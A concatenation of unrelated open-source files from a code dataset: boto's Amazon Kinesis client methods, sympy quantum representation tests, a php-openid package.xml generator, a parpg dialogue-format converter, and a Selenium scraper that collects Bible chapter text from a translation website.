def get_records(self, shard_iterator, limit=None, b64_decode=True):
"""
This operation returns one or more data records from a shard.
A `GetRecords` operation request can retrieve up to 10 MB of
data.
You specify a shard iterator for the shard that you want to
read data from in the `ShardIterator` parameter. The shard
iterator specifies the position in the shard from which you
want to start reading data records sequentially. A shard
iterator specifies this position using the sequence number of
a data record in the shard. For more information about the
shard iterator, see GetShardIterator.
`GetRecords` may return a partial result if the response size
limit is exceeded. You will get an error, but not a partial
result if the shard's provisioned throughput is exceeded, the
shard iterator has expired, or an internal processing failure
has occurred. Clients can request a smaller amount of data by
specifying a maximum number of returned records using the
`Limit` parameter. The `Limit` parameter can be set to an
integer value of up to 10,000. If you set the value to an
integer greater than 10,000, you will receive
`InvalidArgumentException`.
A new shard iterator is returned by every `GetRecords` request
in `NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request. When you
repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to
use in your first `GetRecords` request and then use the shard
iterator returned in `NextShardIterator` for subsequent reads.
`GetRecords` can return `null` for the `NextShardIterator` to
reflect that the shard has been closed and that the requested
shard iterator would never have returned more data.
If no items can be processed because of insufficient
provisioned throughput on the shard involved in the request,
`GetRecords` throws `ProvisionedThroughputExceededException`.
:type shard_iterator: string
:param shard_iterator: The position in the shard from which you want to
start sequentially reading data records.
:type limit: integer
:param limit: The maximum number of records to return, which can be set
to a value of up to 10,000.
:type b64_decode: boolean
:param b64_decode: Decode the Base64-encoded ``Data`` field of records.
"""
params = {'ShardIterator': shard_iterator, }
if limit is not None:
params['Limit'] = limit
response = self.make_request(action='GetRecords',
body=json.dumps(params))
# Base64 decode the data
if b64_decode:
for record in response.get('Records', []):
record['Data'] = base64.b64decode(record['Data'])
return response
def get_shard_iterator(self, stream_name, shard_id, shard_iterator_type,
starting_sequence_number=None):
"""
This operation returns a shard iterator in `ShardIterator`.
The shard iterator specifies the position in the shard from
which you want to start reading data records sequentially. A
shard iterator specifies this position using the sequence
number of a data record in a shard. A sequence number is the
identifier associated with every record ingested in the Amazon
Kinesis stream. The sequence number is assigned by the Amazon
Kinesis service when a record is put into the stream.
You must specify the shard iterator type in the
`GetShardIterator` request. For example, you can set the
`ShardIteratorType` parameter to read exactly from the
position denoted by a specific sequence number by using the
AT_SEQUENCE_NUMBER shard iterator type, or right after the
sequence number by using the AFTER_SEQUENCE_NUMBER shard
iterator type, using sequence numbers returned by earlier
PutRecord, GetRecords or DescribeStream requests. You can
specify the shard iterator type TRIM_HORIZON in the request to
cause `ShardIterator` to point to the last untrimmed record in
the shard in the system, which is the oldest data record in
the shard. Or you can point to just after the most recent
record in the shard, by using the shard iterator type LATEST,
so that you always read the most recent data in the shard.
**Note:** Each shard iterator expires five minutes after it is
returned to the requester.
When you repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to to
use in your first `GetRecords` request and then use the shard
iterator returned by the `GetRecords` request in
`NextShardIterator` for subsequent reads. A new shard iterator
is returned by every `GetRecords` request in
`NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request.
If a `GetShardIterator` request is made too often, you will
receive a `ProvisionedThroughputExceededException`. For more
information about throughput limits, see the `Amazon Kinesis
Developer Guide`_.
`GetShardIterator` can return `null` for its `ShardIterator`
to indicate that the shard has been closed and that the
requested iterator will return no more data. A shard can be
closed by a SplitShard or MergeShards operation.
`GetShardIterator` has a limit of 5 transactions per second
per account per shard.
:type stream_name: string
:param stream_name: The name of the stream.
:type shard_id: string
:param shard_id: The shard ID of the shard to get the iterator for.
:type shard_iterator_type: string
:param shard_iterator_type:
Determines how the shard iterator is used to start reading data records
from the shard.
The following are the valid shard iterator types:
+ AT_SEQUENCE_NUMBER - Start reading exactly from the position denoted
by a specific sequence number.
+ AFTER_SEQUENCE_NUMBER - Start reading right after the position
denoted by a specific sequence number.
+ TRIM_HORIZON - Start reading at the last untrimmed record in the
shard in the system, which is the oldest data record in the shard.
+ LATEST - Start reading just after the most recent record in the
shard, so that you always read the most recent data in the shard.
:type starting_sequence_number: string
:param starting_sequence_number: The sequence number of the data record
in the shard from which to start reading from.
"""
params = {
'StreamName': stream_name,
'ShardId': shard_id,
'ShardIteratorType': shard_iterator_type,
}
if starting_sequence_number is not None:
params['StartingSequenceNumber'] = starting_sequence_number
return self.make_request(action='GetShardIterator',
body=json.dumps(params))
def list_streams(self, limit=None, exclusive_start_stream_name=None):
"""
This operation returns an array of the names of all the
streams that are associated with the AWS account making the
`ListStreams` request. A given AWS account can have many
streams active at one time.
The number of streams may be too large to return from a single
call to `ListStreams`. You can limit the number of returned
streams using the `Limit` parameter. If you do not specify a
value for the `Limit` parameter, Amazon Kinesis uses the
default limit, which is currently 10.
You can detect if there are more streams available to list by
using the `HasMoreStreams` flag from the returned output. If
there are more streams available, you can request more streams
by using the name of the last stream returned by the
`ListStreams` request in the `ExclusiveStartStreamName`
parameter in a subsequent request to `ListStreams`. The group
of stream names returned by the subsequent request is then
added to the list. You can continue this process until all the
stream names have been collected in the list.
`ListStreams` has a limit of 5 transactions per second per
account.
:type limit: integer
:param limit: The maximum number of streams to list.
:type exclusive_start_stream_name: string
:param exclusive_start_stream_name: The name of the stream to start the
list with.
"""
params = {}
if limit is not None:
params['Limit'] = limit
if exclusive_start_stream_name is not None:
params['ExclusiveStartStreamName'] = exclusive_start_stream_name
return self.make_request(action='ListStreams',
body=json.dumps(params))
def merge_shards(self, stream_name, shard_to_merge,
adjacent_shard_to_merge):
"""
This operation merges two adjacent shards in a stream and
combines them into a single shard to reduce the stream's
capacity to ingest and transport data. Two shards are
considered adjacent if the union of the hash key ranges for
the two shards form a contiguous set with no gaps. For
example, if you have two shards, one with a hash key range of
276...381 and the other with a hash key range of 382...454,
then you could merge these two shards into a single shard that
would have a hash key range of 276...454. After the merge, the
single child shard receives data for all hash key values
covered by the two parent shards.
`MergeShards` is called when there is a need to reduce the
overall capacity of a stream because of excess capacity that
is not being used. The operation requires that you specify the
shard to be merged and the adjacent shard for a given stream.
For more information about merging shards, see the `Amazon
Kinesis Developer Guide`_.
If the stream is in the ACTIVE state, you can call
`MergeShards`. If a stream is in CREATING or UPDATING or
DELETING states, then Amazon Kinesis returns a
`ResourceInUseException`. If the specified stream does not
exist, Amazon Kinesis returns a `ResourceNotFoundException`.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`MergeShards` is an asynchronous operation. Upon receiving a
`MergeShards` request, Amazon Kinesis immediately returns a
response and sets the `StreamStatus` to UPDATING. After the
operation is completed, Amazon Kinesis sets the `StreamStatus`
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You use the DescribeStream operation to determine the shard
IDs that are specified in the `MergeShards` request.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, `MergeShards` or SplitShard, you
will receive a `LimitExceededException`.
`MergeShards` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the merge.
:type shard_to_merge: string
:param shard_to_merge: The shard ID of the shard to combine with the
adjacent shard for the merge.
:type adjacent_shard_to_merge: string
:param adjacent_shard_to_merge: The shard ID of the adjacent shard for
the merge.
"""
params = {
'StreamName': stream_name,
'ShardToMerge': shard_to_merge,
'AdjacentShardToMerge': adjacent_shard_to_merge,
}
return self.make_request(action='MergeShards',
body=json.dumps(params))
def put_record(self, stream_name, data, partition_key,
explicit_hash_key=None,
sequence_number_for_ordering=None,
exclusive_minimum_sequence_number=None,
b64_encode=True):
"""
This operation puts a data record into an Amazon Kinesis
stream from a producer. This operation must be called to send
data from the producer into the Amazon Kinesis stream for
real-time ingestion and subsequent processing. The `PutRecord`
operation requires the name of the stream that captures,
stores, and transports the data; a partition key; and the data
blob itself. The data blob could be a segment from a log file,
geographic/location data, website clickstream data, or any
other data type.
The partition key is used to distribute data across shards.
Amazon Kinesis segregates the data records that belong to a
data stream into multiple shards, using the partition key
associated with each data record to determine which shard a
given data record belongs to.
Partition keys are Unicode strings, with a maximum length
limit of 256 bytes. An MD5 hash function is used to map
partition keys to 128-bit integer values and to map associated
data records to shards using the hash key ranges of the
shards. You can override hashing the partition key to
determine the shard by explicitly specifying a hash value
using the `ExplicitHashKey` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
`PutRecord` returns the shard ID of where the data record was
placed and the sequence number that was assigned to the data
record.
Sequence numbers generally increase over time. To guarantee
strictly increasing ordering, use the
`SequenceNumberForOrdering` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
If a `PutRecord` request cannot be processed because of
insufficient provisioned throughput on the shard involved in
the request, `PutRecord` throws
`ProvisionedThroughputExceededException`.
Data records are accessible for only 24 hours from the time
that they are added to an Amazon Kinesis stream.
:type stream_name: string
:param stream_name: The name of the stream to put the data record into.
:type data: blob
:param data: The data blob to put into the record, which is
Base64-encoded when the blob is serialized.
The maximum size of the data blob (the payload after
Base64-decoding) is 50 kilobytes (KB)
Set `b64_encode` to disable automatic Base64 encoding.
:type partition_key: string
:param partition_key: Determines which shard in the stream the data
record is assigned to. Partition keys are Unicode strings with a
maximum length limit of 256 bytes. Amazon Kinesis uses the
partition key as input to a hash function that maps the partition
key and associated data to a specific shard. Specifically, an MD5
hash function is used to map partition keys to 128-bit integer
values and to map associated data records to shards. As a result of
this hashing mechanism, all data records with the same partition
key will map to the same shard within the stream.
:type explicit_hash_key: string
:param explicit_hash_key: The hash value used to explicitly determine
the shard the data record is assigned to by overriding the
partition key hash.
:type sequence_number_for_ordering: string
:param sequence_number_for_ordering: Guarantees strictly increasing
sequence numbers, for puts from the same client and to the same
partition key. Usage: set the `SequenceNumberForOrdering` of record
n to the sequence number of record n-1 (as returned in the
PutRecordResult when putting record n-1 ). If this parameter is not
set, records will be coarsely ordered based on arrival time.
:type b64_encode: boolean
:param b64_encode: Whether to Base64 encode `data`. Can be set to
``False`` if `data` is already encoded to prevent double encoding.
"""
params = {
'StreamName': stream_name,
'Data': data,
'PartitionKey': partition_key,
}
if explicit_hash_key is not None:
params['ExplicitHashKey'] = explicit_hash_key
if sequence_number_for_ordering is not None:
params['SequenceNumberForOrdering'] = sequence_number_for_ordering
if b64_encode:
params['Data'] = base64.b64encode(params['Data'])
return self.make_request(action='PutRecord',
body=json.dumps(params))
def split_shard(self, stream_name, shard_to_split, new_starting_hash_key):
"""
This operation splits a shard into two new shards in the
stream, to increase the stream's capacity to ingest and
transport data. `SplitShard` is called when there is a need to
increase the overall capacity of stream because of an expected
increase in the volume of data records being ingested.
`SplitShard` can also be used when a given shard appears to be
approaching its maximum utilization, for example, when the set
of producers sending data into the specific shard are suddenly
sending more than previously anticipated. You can also call
the `SplitShard` operation to increase stream capacity, so
that more Amazon Kinesis applications can simultaneously read
data from the stream for real-time processing.
The `SplitShard` operation requires that you specify the shard
to be split and the new hash key, which is the position in the
shard where the shard gets split in two. In many cases, the
new hash key might simply be the average of the beginning and
ending hash key, but it can be any hash key value in the range
being mapped into the shard. For more information about
splitting shards, see the `Amazon Kinesis Developer Guide`_.
You can use the DescribeStream operation to determine the
shard ID and hash key values for the `ShardToSplit` and
`NewStartingHashKey` parameters that are specified in the
`SplitShard` request.
`SplitShard` is an asynchronous operation. Upon receiving a
`SplitShard` request, Amazon Kinesis immediately returns a
response and sets the stream status to UPDATING. After the
operation is completed, Amazon Kinesis sets the stream status
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You can use `DescribeStream` to check the status of the
stream, which is returned in `StreamStatus`. If the stream is
in the ACTIVE state, you can call `SplitShard`. If a stream is
in CREATING or UPDATING or DELETING states, then Amazon
Kinesis returns a `ResourceInUseException`.
If the specified stream does not exist, Amazon Kinesis returns
a `ResourceNotFoundException`. If you try to create more
shards than are authorized for your account, you receive a
`LimitExceededException`.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, MergeShards or SplitShard, you
will receive a `LimitExceededException`.
`SplitShard` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the shard split.
:type shard_to_split: string
:param shard_to_split: The shard ID of the shard to split.
:type new_starting_hash_key: string
:param new_starting_hash_key: A hash key value for the starting hash
key of one of the child shards created by the split. The hash key
range for a given shard constitutes a set of ordered contiguous
positive integers. The value for `NewStartingHashKey` must be in
the range of hash keys being mapped into the shard. The
`NewStartingHashKey` hash key value and all higher hash key values
in hash key range are distributed to one of the child shards. All
the lower hash key values in the range are distributed to the other
child shard.
"""
params = {
'StreamName': stream_name,
'ShardToSplit': shard_to_split,
'NewStartingHashKey': new_starting_hash_key,
}
return self.make_request(action='SplitShard',
body=json.dumps(params))
def make_request(self, action, body):
headers = {
'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
'Host': self.region.endpoint,
'Content-Type': 'application/x-amz-json-1.1',
'Content-Length': str(len(body)),
}
http_request = self.build_base_http_request(
method='POST', path='/', auth_path='/', params={},
headers=headers, data=body)
response = self._mexe(http_request, sender=None,
override_num_retries=10)
response_body = response.read()
boto.log.debug(response.getheaders())
boto.log.debug(response_body)
if response.status == 200:
if response_body:
return json.loads(response_body)
else:
json_body = json.loads(response_body)
fault_name = json_body.get('__type', None)
exception_class = self._faults.get(fault_name, self.ResponseError)
raise exception_class(response.status, response.reason,
body=json_body)
|
bsd-3-clause
|
Vishluck/sympy
|
sympy/physics/quantum/tests/test_represent.py
|
124
|
5124
|
from sympy import Float, I, Integer, Matrix
from sympy.external import import_module
from sympy.utilities.pytest import skip
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.represent import (represent, rep_innerproduct,
rep_expectation, enumerate_states)
from sympy.physics.quantum.state import Bra, Ket
from sympy.physics.quantum.operator import Operator, OuterProduct
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.tensorproduct import matrix_tensor_product
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.matrixutils import (numpy_ndarray,
scipy_sparse_matrix, to_numpy,
to_scipy_sparse, to_sympy)
from sympy.physics.quantum.cartesian import XKet, XOp, XBra
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.operatorset import operators_to_state
Amat = Matrix([[1, I], [-I, 1]])
Bmat = Matrix([[1, 2], [3, 4]])
Avec = Matrix([[1], [I]])
class AKet(Ket):
@classmethod
def dual_class(self):
return ABra
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Avec
class ABra(Bra):
@classmethod
def dual_class(self):
return AKet
class AOp(Operator):
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Amat
class BOp(Operator):
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Bmat
k = AKet('a')
b = ABra('a')
A = AOp('A')
B = BOp('B')
_tests = [
# Bra
(b, Dagger(Avec)),
(Dagger(b), Avec),
# Ket
(k, Avec),
(Dagger(k), Dagger(Avec)),
# Operator
(A, Amat),
(Dagger(A), Dagger(Amat)),
# OuterProduct
(OuterProduct(k, b), Avec*Avec.H),
# TensorProduct
(TensorProduct(A, B), matrix_tensor_product(Amat, Bmat)),
# Pow
(A**2, Amat**2),
# Add/Mul
(A*B + 2*A, Amat*Bmat + 2*Amat),
# Commutator
(Commutator(A, B), Amat*Bmat - Bmat*Amat),
# AntiCommutator
(AntiCommutator(A, B), Amat*Bmat + Bmat*Amat),
# InnerProduct
(InnerProduct(b, k), (Avec.H*Avec)[0])
]
def test_format_sympy():
for test in _tests:
lhs = represent(test[0], basis=A, format='sympy')
rhs = to_sympy(test[1])
assert lhs == rhs
def test_scalar_sympy():
assert represent(Integer(1)) == Integer(1)
assert represent(Float(1.0)) == Float(1.0)
assert represent(1.0 + I) == 1.0 + I
np = import_module('numpy')
def test_format_numpy():
if not np:
skip("numpy not installed.")
for test in _tests:
lhs = represent(test[0], basis=A, format='numpy')
rhs = to_numpy(test[1])
if isinstance(lhs, numpy_ndarray):
assert (lhs == rhs).all()
else:
assert lhs == rhs
def test_scalar_numpy():
if not np:
skip("numpy not installed.")
assert represent(Integer(1), format='numpy') == 1
assert represent(Float(1.0), format='numpy') == 1.0
assert represent(1.0 + I, format='numpy') == 1.0 + 1.0j
scipy = import_module('scipy', __import__kwargs={'fromlist': ['sparse']})
def test_format_scipy_sparse():
if not np:
skip("numpy not installed.")
if not scipy:
skip("scipy not installed.")
for test in _tests:
lhs = represent(test[0], basis=A, format='scipy.sparse')
rhs = to_scipy_sparse(test[1])
if isinstance(lhs, scipy_sparse_matrix):
assert np.linalg.norm((lhs - rhs).todense()) == 0.0
else:
assert lhs == rhs
def test_scalar_scipy_sparse():
if not np:
skip("numpy not installed.")
if not scipy:
skip("scipy not installed.")
assert represent(Integer(1), format='scipy.sparse') == 1
assert represent(Float(1.0), format='scipy.sparse') == 1.0
assert represent(1.0 + I, format='scipy.sparse') == 1.0 + 1.0j
x_ket = XKet('x')
x_bra = XBra('x')
x_op = XOp('X')
def test_innerprod_represent():
assert rep_innerproduct(x_ket) == InnerProduct(XBra("x_1"), x_ket).doit()
assert rep_innerproduct(x_bra) == InnerProduct(x_bra, XKet("x_1")).doit()
try:
rep_innerproduct(x_op)
except TypeError:
return True
def test_operator_represent():
basis_kets = enumerate_states(operators_to_state(x_op), 1, 2)
assert rep_expectation(
x_op) == qapply(basis_kets[1].dual*x_op*basis_kets[0])
def test_enumerate_states():
test = XKet("foo")
assert enumerate_states(test, 1, 1) == [XKet("foo_1")]
assert enumerate_states(
test, [1, 2, 4]) == [XKet("foo_1"), XKet("foo_2"), XKet("foo_4")]
|
bsd-3-clause
|
tqnghiep/sp
|
simplesaml/vendor/openid/php-openid/admin/packagexml.py
|
56
|
4603
|
#!/usr/bin/python
import os
import os.path
def makeMaintainerXML(leads):
maintainer_template = """
<maintainer>
<user>%(user)s</user>
<name>%(name)s</name>
<email>%(email)s</email>
<role>lead</role>
</maintainer>
"""
return "<maintainers>" + \
"".join([maintainer_template % l for l in leads]) + \
"</maintainers>"
def makeLeadXML(leads):
lead_template = """
<lead>
<name>%(name)s</name>
<user>%(user)s</user>
<email>%(email)s</email>
<active>%(active)s</active>
</lead>
"""
return "".join([lead_template % l for l in leads])
INDENT_STRING = " "
def buildContentsXMLFordir(dir_or_file, roles, depth=0, dir_role=None,
all_files=False):
"""
Returns a list of strings, each of which is either a <file> XML
element for the given file or a <dir> element which contains other
<file> elements.
"""
try:
entries = os.listdir(dir_or_file)
dir_role_s = ''
if dir_role:
dir_role_s = ' role="%s"' % (dir_role)
lines = ['%s<dir name="%s"%s>' % (INDENT_STRING * depth,
os.path.basename(dir_or_file),
dir_role_s)]
for entry in entries:
lines += buildContentsXMLFordir(dir_or_file + os.sep + entry, roles,
depth + 1, dir_role, all_files)
lines.append('%s</dir>' % (INDENT_STRING * depth))
return lines
except OSError:
try:
extension = dir_or_file.split(".")[-1]
except:
if not all_files:
return []
if all_files and dir_role:
return ['%s<file name="%s" role="%s" />' %
(INDENT_STRING * depth, os.path.basename(dir_or_file), dir_role)]
elif extension in roles: # Ends in an extension we care about
return ['%s<file name="%s" role="%s" />' %
(INDENT_STRING * depth, os.path.basename(dir_or_file),
roles[extension])]
else:
return []
def buildContentsXML(roles, *dirs):
lines = []
for directory in dirs:
lines.append("\n".join(buildContentsXMLFordir(directory, roles, 1)))
return "\n".join(lines)
def buildDocsXML(*dirs):
lines = []
for directory in dirs:
lines.append("\n".join(buildContentsXMLFordir(directory, {}, 1, 'doc',
all_files=True)))
return "\n".join(lines)
if __name__ == "__main__":
def usage(progname):
print "Usage: %s <package version> <xml template file> <release notes file>" % (progname)
import sys
import time
try:
import xmlconfig
except:
print "Could not import XML configuration module xmlconfig"
sys.exit(1)
# Expect sys.argv[2] to be the name of the XML file template to
# use for processing.
try:
template_f = open(sys.argv[2], 'r')
except Exception, e:
usage(sys.argv[0])
print "Could not open template file:", str(e)
sys.exit(1)
# Expect sys.argv[1] to be the version number to include in the
# package.xml file.
try:
version = sys.argv[1]
except:
usage(sys.argv[0])
sys.exit(2)
# Expect sys.argv[3] to be the name of the release notes file.
try:
release_file = sys.argv[3]
release_file_h = open(release_file, 'r')
release_notes = release_file_h.read().strip()
release_file_h.close()
except Exception, e:
usage(sys.argv[0])
print str(e)
sys.exit(3)
data = xmlconfig.__dict__.copy()
contentsXml = buildContentsXML({'php': 'php'}, *xmlconfig.contents_dirs)
docsXml = buildDocsXML(*xmlconfig.docs_dirs)
contents = '<dir name="/">\n' + contentsXml + \
"\n" + docsXml + '\n </dir>'
contents_v1 = '<filelist><dir name="/" baseinstalldir="Auth">\n' + contentsXml + \
"\n" + docsXml + '\n </dir></filelist>'
data['contents'] = contents
data['contents_version_1'] = contents_v1
data['leads'] = makeLeadXML(xmlconfig.leads)
data['maintainers'] = makeMaintainerXML(xmlconfig.leads)
data['date'] = time.strftime("%Y-%m-%d")
data['version'] = version
data['uri'] = "%s%s-%s.tgz" % (data['package_base_uri'], data['package_name'],
version)
data['release_notes'] = release_notes
template_data = template_f.read()
print template_data % data
|
gpl-2.0
|
parpg/parpg
|
tools/utilities/convert_dialogue.py
|
1
|
3506
|
#!/usr/bin/env python
"""Convert YAML dialogue files from the Techdemo1 format to the new Techdemo2
format.
@author: M. George Hansen <technopolitica@gmail.com>
"""
import os.path
import sys
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import shutil
import logging
from optparse import OptionParser
from parpg.dialogueparsers import (OldYamlDialogueParser, YamlDialogueParser,
DialogueFormatError)
def backup_file(filepath):
dirpath = os.path.dirname(filepath)
filename = os.path.basename(filepath)
shutil.copy2(filepath, os.path.join(dirpath,
'.'.join([filename, 'backup'])))
def convert_dialogue_file(filepath, backup):
logging.info('processing {0}...'.format(filepath))
dummy, extension = os.path.splitext(filepath)
if (not extension == '.yaml'):
logging.info(' skipping {0}: not a yaml file'.format(filepath))
return 1
with file(filepath, 'r') as dialogue_file:
old_parser = OldYamlDialogueParser()
new_parser = YamlDialogueParser()
try:
dialogue = old_parser.load(dialogue_file)
except DialogueFormatError as error:
logging.info(
' unable to convert {0}: unrecognized dialogue format'
.format(filepath)
)
return 1
if (backup):
backup_file(filepath)
logging.info(' backed up {0} as {0}.backup'.format(filepath))
with file(filepath, 'w') as dialogue_file:
new_parser.dump(dialogue, dialogue_file)
logging.info(' successfully converted {0}!'.format(filepath))
usage_message = '''\
usage: convert_dialogue.py [-h] [-n] [-v] [-q] file_or_dir
Convert YAML dialogue files written in Techdemo1 syntax to the new Techdemo2
syntax.
If the file_or_dir argument is a directory, then this script will attempt to
convert all .yaml files in the directory that contain valid dialogues.
By default all processed files are first backed up by adding a ".backup" suffix
to the filename + extension. Backups can be disabled by passing the -n option
to the script.
'''
def main(argv=sys.argv):
# Options.
backup = True
logging_level = logging.WARNING
parser = OptionParser(usage=usage_message,
description="Convert YAML dialogue files written "
"in Techdemo1 syntax to the new "
"Techdemo2 syntax.")
parser.add_option('-n', '--no-backup', default=True)
parser.add_option('-v', '--verbose', action='count', default=0)
parser.add_option('-q', '--quiet', action='count', default=0)
opts, args = parser.parse_args()
verbosity = opts.verbose * 10
quietness = - (opts.quiet * 10)
logging_level += (verbosity + quietness)
logging.basicConfig(format='%(message)s', level=logging_level)
try:
path = args[0]
except IndexError:
parser.print_help()
sys.exit(1)
if (os.path.isdir(path)):
for filepath in os.listdir(path):
qualified_filepath = os.path.join(path, filepath)
if (not os.path.isfile(qualified_filepath)):
continue
convert_dialogue_file(qualified_filepath, backup=backup)
else:
convert_dialogue_file(path, backup=backup)
if __name__ == '__main__':
main()
|
gpl-3.0
|
hoaibang07/Webscrap
|
transcripture/sources/crawler_chuongthieu.py
|
1
|
7017
|
# -*- encoding: utf-8 -*-
import io
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
import urllib2
import urlparse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os.path
zenmatePath = "/home/hbc/.mozilla/firefox/yeyuaq0s.default/extensions/firefox@zenmate.com.xpi"
ffprofile = webdriver.FirefoxProfile()
# ffprofile.set_preference("javascript.enabled", False)
# ffprofile.set_preference('permissions.default.image', 2)
# ffprofile.set_preference('permissions.default.stylesheet', 2)
# ffprofile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
ffprofile.add_extension(zenmatePath)
ffprofile.add_extension('/home/hbc/Downloads/quickjava-2.0.6-fx.xpi')
ffprofile.set_preference("thatoneguydotnet.QuickJava.curVersion", "2.0.6.1") ## Prevents loading the 'thank you for installing screen'
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Images", 2) ## Turns images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.AnimatedImage", 2) ## Turns animated images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.CSS", 2) ## CSS
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Cookies", 2) ## Cookies
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Flash", 2) ## Flash
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Java", 2) ## Java
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.JavaScript", 2) ## JavaScript
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Silverlight", 2) ## Silverlight
driver = webdriver.Firefox(ffprofile)
def _remove_div_vdx(soup):
for div in soup.find_all('div', class_='vidx'):
div.extract()
return soup
def get_data(urlchuong_list, i):
filename = 'urlsach/data/bosung/sach' + str(i) + '.txt'
ftmp = io.open(filename, 'w', encoding='utf-8')
try:
# hdrs = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Connection': 'keep-alive',
# 'Cookie': 'ipq_lip=20376774; ipq_set=1453874029; __atuvc=2%7C4; __utma=126044488.676620502.1453787537.1453787537.1453787537.1; __utmz=126044488.1453787537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ed3f4874b92a29b6ed036adfa5ad6fb3; ipcountry=us',
# 'Host': 'www.transcripture.com',
# 'Referer': 'http://www.transcripture.com/vietnamese-spanish-genesis-1.html',
# 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0'
# }
count = 1
for urlchuong in urlchuong_list:
print('Dang get chuong %d, sach %d'%(count,i))
# urlchuong = 'http://www.transcripture.com/vietnamese-chinese-revelation-3.html'
# print urlchuong
# # create request
# req = urllib2.Request(urlchuong, headers=hdrs)
# # get response
# response = urllib2.urlopen(req)
# soup = BeautifulSoup(response.read())
# Load a page
driver.get(urlchuong)
# delay = 40 # seconds
# try:
# wait = WebDriverWait(driver, delay)
# path = '/html/body/center/div[1]/div[2]/div[4]/table/tbody/tr[2]/td[1]/div/div[1]/form[1]/select/option[66]'
# elem = driver.find_element_by_xpath(path)
# wait.until(EC.visibility_of(elem))
# print "Page is ready!"
# except TimeoutException:
# print "Loading took too much time!"
# #reload page
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.ESCAPE)
# body.send_keys(Keys.F5)
content = driver.page_source
soup = BeautifulSoup(content)
soup = _remove_div_vdx(soup)
# print soup
table_tag = soup.find_all('table', attrs={'width':'100%', 'cellspacing':'0'})[0]
tr_tags = table_tag.find_all('tr')
_len = len(tr_tags)
# in first tr tag:
h2_class = tr_tags[0].find_all('h2', class_='cphd')
ftmp.write(u'' + h2_class[0].get_text() + '|')
ftmp.write(u'' + h2_class[1].get_text() + '\n')
# print table_tag
for x in xrange(1,_len):
data = tr_tags[x].get_text('|')
# print data
# url_ec = url.encode('unicode','utf-8')
ftmp.write(u'' + data + '\n')
count = count + 1
# close file
ftmp.close()
except Exception, e:
print e
# close file
ftmp.close()
def check_numline(filename):
urlsach_list = []
urlsach_file = open(filename, 'r')
for line in urlsach_file:
urlsach_list.append(line.strip())
_len = len(urlsach_list)
return _len
def getsttchuongthieu(sachi):
list_stt = []
urlsach = 'urlsach/sach' + str(sachi) + '.txt'
#kiem tra so dong cua url sach, tuong ung voi so chuong
numline = check_numline(urlsach)
fname = 'urlsach/data/partcomplete/sach' + str(sachi) + '.txt'
#doc data tu file sach data
data = open(fname).read()
#kiem tra xem moi dong trong file sach data da co chuong cac so nay chua
for i in xrange(1,numline + 1):
key = str(i)
# print ('da chay den day')
if key not in data:
list_stt.append(i)
return list_stt
def getlisturlchuongthieu(sachi):
list_chuongthieu = []
list_stt = getsttchuongthieu(sachi)
fname = 'urlsach/sach' + str(sachi) + '.txt'
fp = open(fname)
lines=fp.readlines()
for stt in list_stt:
list_chuongthieu.append(lines[stt-1])
return list_chuongthieu
def main():
for x in xrange(1,67):
#kiem tra xem duong dan co trong thu muc partcomplete hay khong
f2name = 'urlsach/data/partcomplete/sach' + str(x) + '.txt'
if os.path.isfile(f2name):
list_urlchuongthieu = getlisturlchuongthieu(x)
get_data(list_urlchuongthieu, x)
if __name__ == '__main__':
# driver = webdriver.Firefox()
driver.get("about:blank")
# open new tab
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.CONTROL + 't')
# time.sleep(15)
print('Nhap vao mot ky tu bat ky de tiep tuc chuong trinh')
key = raw_input()
main()
# close the tab
driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w')
driver.close()
# urlchuong_list = ['http://www.transcripture.com/vietnamese-chinese-exodus-1.html']
# get_data(urlchuong_list, 2)
|
